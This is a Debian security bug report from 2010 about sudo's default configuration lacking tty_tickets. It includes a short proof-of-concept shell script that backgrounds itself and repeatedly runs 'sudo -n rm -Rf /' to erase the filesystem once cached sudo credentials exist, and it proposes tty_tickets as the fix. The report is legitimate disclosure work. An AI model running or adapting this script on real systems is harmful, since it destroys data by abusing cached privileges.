Secure testing team - Jan 2010 - Bug#567614: sudo's default configuration without tty-tickets

Package: sudo
Version: 1.7.2p1-1
Severity: critical
Tags: security
Justification: root security hole

sudo''s default configuration is with a timestamp of 15''
and without tty_tickets.
So with a classical add of one user (just adding

superman   ALL=(ALL) ALL

as it is done in Ubuntu for instance), a simple script like

#!/bin/sh
if [ -z $1 ] ; then
    FILE=$0
    echo $FILE
    . $FILE vasy > /dev/null 2> /dev/null &
else
    while /bin/true ; do
    echo sudo -n rm -Rf / >> /tmp/grrrr
    sleep 60
    done
fi

call one time by superman erase the file system as soon
as a sudo call is done. This configuration is very used.

The package must be or configured with tty_tickets in sudoers
file , or compiled with the option --with-tty-tickets. This solves
the problem.

Fran?ois Boisson (sorry for English faults)

-- System Information:
Debian Release: squeeze/sid
  APT prefers testing
  APT policy: (500, ''testing'')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-2-amd64 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages sudo depends on:
ii  libc6                         2.10.2-2   GNU C Library: Shared libraries
ii  libpam-modules                1.1.0-4    Pluggable Authentication Modules f
ii  libpam0g                      1.1.0-4    Pluggable Authentication Modules l

sudo recommends no packages.

sudo suggests no packages.

-- no debconf information